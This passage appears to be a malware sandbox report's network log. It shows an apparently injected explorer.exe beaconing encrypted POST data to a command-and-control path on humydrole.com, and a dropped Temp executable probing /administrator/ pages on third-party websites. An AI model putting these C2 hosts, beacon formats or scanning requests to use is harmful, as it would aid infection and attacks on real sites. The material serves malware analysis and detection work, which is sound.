                                                                                                                                                                                                                                                                                                                                Data Raw: 04 00 00 00 72 e8 85 e4
                                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                12192.168.2.449766180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:16.069571972 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://hsobffrvmnsfd.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:16.069627047 CET243OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 3c 04 fb 8f
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu<3[C_T<<k0M0^/Q>9,6+tj+l@k\2=\4o-fZ4bRyqCr.r9C
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:17.079638958 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:16 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                13192.168.2.449768180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:17.410340071 CET287OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://tudkvhlcrmwxulqv.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 200
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:17.410366058 CET200OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 4e 3a b6 eb
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuN:5}skd].+&b^^#P2@"LP|d:#3>68D$zR
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:18.408915043 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:17 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                14192.168.2.449769180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:18.778119087 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://hwltvbnrfeycxra.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 156
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:18.778183937 CET156OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 43 50 da 84
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuCP4~vvj41(ivVTS=EpoETjX%
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:19.801161051 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:19 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                15192.168.2.449771180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.162834883 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://rtgfdegyifa.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 303
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.162894964 CET303OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7e 02 a7 ed
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu~SmDlJl`42FG+gb'|5MQ- SK>R'LVM^#iGHt]@.6;iYo"VfvyL<
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.182566881 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:20 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                16192.168.2.45138585.248.129.35805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.686316967 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: inhodinky.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.937294960 CET391INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://inhodinky.sk/administrator/
                                                                                                                                                                                                                                                                                                                                X-Aws-Security-Level: 23
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.236814976 CET185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: inhodinky.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.487632990 CET400INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:03 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://inhodinky.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                X-Aws-Security-Level: 23
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                17192.168.2.451482217.160.223.67805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.791013956 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.038269997 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.039496899 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://elossa.de/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.284790039 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                18192.168.2.451481217.160.223.67805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.800018072 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.045455933 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
